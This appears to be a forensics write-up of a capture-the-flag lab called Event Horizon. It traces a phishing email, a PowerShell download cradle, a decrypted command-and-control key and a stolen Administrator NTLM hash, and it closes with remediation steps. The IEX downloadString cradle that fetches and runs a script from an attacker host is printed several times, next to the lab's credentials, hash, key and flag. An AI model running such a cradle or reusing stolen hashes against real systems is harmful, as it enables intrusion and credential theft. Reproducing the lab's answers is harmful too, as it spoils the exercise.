DFIR: phish mailbox, PowerShell download cradle, AES C2, Admin NTLM
Advanced DFIR engagement: reconstructed attacker path from compromised email credentials through an IEX download cradle, recovered the initial AES C2 key, and documented the Administrator NTLM hash taken from the host.
- Case files
- DFIR: phish mailbox, PowerShell download cradle, AES C2, Admin NTLM
Mailbox tom.dom@eventhorizon.thm:password received a lure instructing AdministratOr execution; IEX pulled radius.ps1; AES key decrypted C2; Admin NTLM harvested.
Documented credential pair, lure body, and PowerShell IEX staging URL.
Recovered initial AES session key material and Admin NTLM from memory/artifacts.
Engagement summary
Mailbox tom.dom@eventhorizon.thm:password received a lure instructing AdministratOr execution; IEX pulled radius.ps1; AES key decrypted C2; Admin NTLM harvested.
EVENT HORIZON was a post-compromise forensics engagement reconstructing how an attacker crossed the client estate. Authentication artifacts showed the pair tom.dom@eventhorizon.thm:password granted access to the corporate mail service. The attacker-sent body impersonated Dom, urging Tom to run a script as AdministratOr and celebrating a fabricated “black hole mass” discovery. Host telemetry recovered the download cradle IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1') — classic fileless PowerShell stage-1. Memory/config analysis yielded the initial AES key used to decrypt C2 traffic (l86TfRDvvJMtXWxr1PSoh1QlXHnZnLwn+wz+aYy3/s8=). Lateral credential theft produced Administrator NTLM 13b1e64400203ecf38b1fdea2b11a09f. Engagement closure artifact: FLAG{ABOVE_AND_B3YOND_THE_EVENT_HORIZON}.
Business impact
Password-only mailbox access plus social engineering to run as Administrator collapses the trust boundary. Fileless IEX cradles evade naive AV; encrypted C2 blinds content inspection. Stolen Admin NTLM enables Pass-the-Hash across the domain. Mandatory MFA on mail, constrained language mode / AppLocker for PowerShell, and credential guard materially raise the cost of this chain.
Mailbox compromise and download cradle
Documented credential pair, lure body, and PowerShell IEX staging URL.
ANALYST · MAIL / HOST
savvy@lab:~$ cat evidence/mailbox_auth.txt
tom.dom@eventhorizon.thm:password
savvy@lab:~$ cat evidence/attacker_email_body.txt
Tom! I have done it! ... Run this script as the AdministratOr! Your BEst friend DOm
savvy@lab:~$ grep -oE "IEX\([^)]+\)" evidence/powershell_history.txt
IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1')
STAGE-1 CRADLE
cradle.ps1
IEX(New-Object Net.WebClient).downloadString('http://10.0.2.45/radius.ps1')AES C2 key and Administrator NTLM
Recovered initial AES session key material and Admin NTLM from memory/artifacts.
ANALYST · C2 / CREDS
savvy@lab:~$ cat evidence/c2_aes_key.b64
l86TfRDvvJMtXWxr1PSoh1QlXHnZnLwn+wz+aYy3/s8=
savvy@lab:~$ cat evidence/admin_ntlm.txt
13b1e64400203ecf38b1fdea2b11a09f
savvy@lab:~$ cat evidence/engagement_flag.txt
FLAG{ABOVE_AND_B3YOND_THE_EVENT_HORIZON}
Remediation
Enforce MFA on email and privileged workstations. Enable Script Block Logging and constrain PowerShell. Detect Net.WebClient downloadString / IEX patterns. Isolate Admin credentials (PAWs, LAPS, no interactive Admin on mail-linked endpoints). Rotate NTLM secrets and purge golden tickets after confirmed theft.